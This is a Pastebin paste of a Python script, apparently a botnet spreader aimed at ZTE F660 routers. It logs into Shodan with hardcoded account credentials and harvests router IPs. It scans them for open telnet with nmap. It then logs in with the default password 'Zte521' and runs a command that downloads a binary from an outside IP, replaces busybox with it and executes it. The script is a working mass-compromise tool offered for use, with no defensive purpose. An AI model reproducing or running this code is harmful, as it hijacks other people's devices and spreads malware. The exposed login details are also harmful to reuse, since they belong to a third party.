API tools faq
paste
Advertisement
uzycie

zte.py

uzycie
May 16th, 2017
780
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.35 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python
  2.  
  3. ''' Requirement:
  4. 1. Python 2.x Meterpreter
  5. 2. Nmap - Port Scanner
  6. '''
  7.  
  8. import mechanize
  9. import re
  10. import telnetlib
  11. import os
  12.  
  13. print '''
  14. ################################################
  15. ### Auto ZTE F660 Mass IPul By: IRONBUGS ###
  16. ################################################
  17.  
  18. '''
  19. ## Login, set header, handle cookie(?).
  20. print "[+] Logging in to shodan.io ..."
  21. dk = mechanize.Browser()
  22. dk.set_handle_robots(False)
  23. dk.addheaders = [("User-agent","Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13")]
  24. sign_in = dk.open("https://account.shodan.io/login")
  25. dk.select_form(nr = 0)
  26. dk["username"] = "uzycie" #username shodan account
  27. dk["password"] = "scarlette3" #password shodan account
  28. logged_in = dk.submit()
  29.  
  30. ## Buat file.txt dulu, buat nanti setor IP.
  31. dkfile = open("/root/Desktop/RouterIP.txt", "w+")
  32. dkfile.close()
  33.  
  34. ## Ambil semua IP per page, max 5 pages untuk Free member
  35. print "[+] Collecting IP Address..."
  36. maxPage = 1
  37.  
  38. while maxPage <= 5:
  39. req = dk.open("https://www.shodan.io/search?query=f660&page="+str(maxPage))
  40. respData = req.read()
  41. ip = re.findall(r'<div class="ip"><a href="/host/.*?">(.*?)</a>',str(respData))
  42. doofile = open("/root/Desktop/RouterIP.txt", "a")
  43. try:
  44. for anu in ip:
  45. doofile.write(str(anu)+"\n")
  46. except:
  47. pass
  48. maxPage += 1
  49. doofile.close()
  50. print "[+] Done..!!! File saved in /root/Desktop/RouterIP.txt"
  51.  
  52. print "[+] Scanning Telnet Port..."
  53. os.system("nmap -T5 -vv -iL /root/Desktop/RouterIP.txt -p 23 | grep 'Discovered open port' | awk {'print $6'} | awk -F/ {'print $1'} > /root/Desktop/IP.txt")
  54. print "[+] Saved in /root/Desktop/IP.txt"
  55.  
  56. print "[+] Logging in to target...."
  57. iplist = open("/root/Desktop/IP.txt").read()
  58. iplist = iplist.split()
  59. for ipx in iplist:
  60. try:
  61. tn = telnetlib.Telnet(ipx, None, 13)
  62. tn.read_until("Login: ")
  63. tn.write("root\n")
  64. tn.read_until("Password: ")
  65. tn.write("Zte521\n")
  66. tn.write("cd /var/; rm -rf busybox filename; wget http://50.115.166.164/tftp -O filename ; cp /bin/busybox ./; busybox cat filename > busybox;./busybox ;rm -rf busybox filename\n")
  67. time.sleep(15)
  68. #print tn.read_all()
  69. tn.write("exit\n")
  70. tn.close()
  71. print ipx,'...Login Success !!! Target is Vulnerable'
  72. except Exception, e:
  73. print ipx, e, '...Not Vulnerable'
  74. continue
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!